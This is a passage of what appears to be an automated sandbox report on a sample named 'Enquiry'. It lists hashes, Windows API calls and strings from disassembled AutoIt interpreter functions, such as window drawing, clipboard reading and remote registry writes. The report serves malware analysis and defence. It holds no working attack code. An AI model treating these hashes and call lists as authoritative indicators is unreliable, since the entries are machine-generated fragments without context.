                            • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                            • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                            • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                            • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                            APIs
                            • DeleteObject.GDI32(?), ref: 0045953B
                            • DeleteObject.GDI32(?), ref: 00459551
                            • DestroyWindow.USER32(?), ref: 00459563
                            • GetDesktopWindow.USER32 ref: 00459581
                            • GetWindowRect.USER32(00000000), ref: 00459588
                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                            • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                            • GetClientRect.USER32(00000000,?), ref: 004596F8
                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                            • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                            • GlobalLock.KERNEL32(00000000), ref: 0045978F
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                            • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                            • CloseHandle.KERNEL32(00000000), ref: 004597AC
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                            • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                            • GlobalFree.KERNEL32(00000000), ref: 004597E2
                            • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                            • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                            • ShowWindow.USER32(?,00000004), ref: 00459865
                            • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                            • GetStockObject.GDI32(00000011), ref: 004598CD
                            • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                            • DeleteDC.GDI32(00000000), ref: 004598F8
                            • _wcslen.LIBCMT ref: 00459916
                            • _wcscpy.LIBCMT ref: 0045993A
                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                            • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                            • GetDC.USER32(00000000), ref: 004599FC
                            • SelectObject.GDI32(00000000,?), ref: 00459A0C
                            • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                            • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                            • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                            • String ID: $AutoIt v3$DISPLAY$static
                            • API String ID: 4040870279-2373415609
                            • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                            • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                            • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                            • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                            APIs
                            • GetSysColor.USER32(00000012), ref: 0044181E
                            • SetTextColor.GDI32(?,?), ref: 00441826
                            • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                            • GetSysColor.USER32(0000000F), ref: 00441849
                            • SetBkColor.GDI32(?,?), ref: 00441864
                            • SelectObject.GDI32(?,?), ref: 00441874
                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                            • GetSysColor.USER32(00000010), ref: 004418B2
                            • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                            • FrameRect.USER32(?,?,00000000), ref: 004418CA
                            • DeleteObject.GDI32(?), ref: 004418D5
                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                            • FillRect.USER32(?,?,?), ref: 00441970
                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                              • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                              • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                              • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                              • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                              • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                              • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                              • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                              • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                              • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                              • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                              • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                            • String ID:
                            • API String ID: 69173610-0
                            • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                            • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                            • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                            • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                            APIs
                            • DestroyWindow.USER32(?), ref: 004590F2
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                            • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                            • GetClientRect.USER32(00000000,?), ref: 0045924E
                            • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                            • GetStockObject.GDI32(00000011), ref: 004592AC
                            • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                            • DeleteDC.GDI32(00000000), ref: 004592D6
                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                            • GetStockObject.GDI32(00000011), ref: 004593D3
                            • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                            • API String ID: 2910397461-517079104
                            • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                            • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                            • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                            • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                            • API String ID: 1038674560-3360698832
                            • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                            • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                            • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                            • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                            APIs
                            • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                            • SetCursor.USER32(00000000), ref: 0043075B
                            • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                            • SetCursor.USER32(00000000), ref: 00430773
                            • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                            • SetCursor.USER32(00000000), ref: 0043078B
                            • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                            • SetCursor.USER32(00000000), ref: 004307A3
                            • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                            • SetCursor.USER32(00000000), ref: 004307BB
                            • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                            • SetCursor.USER32(00000000), ref: 004307D3
                            • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                            • SetCursor.USER32(00000000), ref: 004307EB
                            • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                            • SetCursor.USER32(00000000), ref: 00430803
                            • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                            • SetCursor.USER32(00000000), ref: 0043081B
                            • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                            • SetCursor.USER32(00000000), ref: 00430833
                            • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                            • SetCursor.USER32(00000000), ref: 0043084B
                            • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                            • SetCursor.USER32(00000000), ref: 00430863
                            • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                            • SetCursor.USER32(00000000), ref: 0043087B
                            • SetCursor.USER32(00000000), ref: 00430887
                            • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                            • SetCursor.USER32(00000000), ref: 0043089F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Cursor$Load
                            • String ID:
                            • API String ID: 1675784387-0
                            • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                            • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                            • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                            • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                            APIs
                            • GetSysColor.USER32(0000000E), ref: 00430913
                            • SetTextColor.GDI32(?,00000000), ref: 0043091B
                            • GetSysColor.USER32(00000012), ref: 00430933
                            • SetTextColor.GDI32(?,?), ref: 0043093B
                            • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                            • GetSysColor.USER32(0000000F), ref: 00430959
                            • CreateSolidBrush.GDI32(?), ref: 00430962
                            • GetSysColor.USER32(00000011), ref: 00430979
                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                            • SelectObject.GDI32(?,00000000), ref: 0043099C
                            • SetBkColor.GDI32(?,?), ref: 004309A6
                            • SelectObject.GDI32(?,?), ref: 004309B4
                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                            • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                            • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                            • DrawFocusRect.USER32(?,?), ref: 00430A91
                            • GetSysColor.USER32(00000011), ref: 00430A9F
                            • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                            • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                            • SelectObject.GDI32(?,?), ref: 00430AD0
                            • DeleteObject.GDI32(00000105), ref: 00430ADC
                            • SelectObject.GDI32(?,?), ref: 00430AE3
                            • DeleteObject.GDI32(?), ref: 00430AE9
                            • SetTextColor.GDI32(?,?), ref: 00430AF0
                            • SetBkColor.GDI32(?,?), ref: 00430AFB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                            • String ID:
                            • API String ID: 1582027408-0
                            • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                            • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                            • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                            • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                            APIs
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                            • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CloseConnectCreateRegistry
                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                            • API String ID: 3217815495-966354055
                            • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                            • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                            • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                            • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                            APIs
                            • GetCursorPos.USER32(?), ref: 004566AE
                            • GetDesktopWindow.USER32 ref: 004566C3
                            • GetWindowRect.USER32(00000000), ref: 004566CA
                            • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                            • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                            • DestroyWindow.USER32(?), ref: 00456746
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                            • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                            • IsWindowVisible.USER32(?), ref: 0045682C
                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                            • GetWindowRect.USER32(?,?), ref: 00456873
                            • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                            • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                            • CopyRect.USER32(?,?), ref: 004568BE
                            • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                            • String ID: ($,$tooltips_class32
                            • API String ID: 225202481-3320066284
                            • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                            • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                            • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                            • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                            APIs
                            • OpenClipboard.USER32(?), ref: 0046DCE7
                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                            • CloseClipboard.USER32 ref: 0046DD0D
                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                            • CloseClipboard.USER32 ref: 0046DD41
                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                            • CloseClipboard.USER32 ref: 0046DD99
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                            • String ID:
                            • API String ID: 15083398-0
                            • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                            • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                            • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                            • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • GetWindowRect.USER32(?,?), ref: 00471CF7
                            • GetClientRect.USER32(?,?), ref: 00471D05
                            • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                            • GetSystemMetrics.USER32(00000008), ref: 00471D20
                            • GetSystemMetrics.USER32(00000004), ref: 00471D42
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                            • GetSystemMetrics.USER32(00000007), ref: 00471D79
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                            • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                            • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                            • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                            • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                            • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                            • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                            • GetClientRect.USER32(?,?), ref: 00471E8A
                            • GetStockObject.GDI32(00000011), ref: 00471EA6
                            • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                            • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
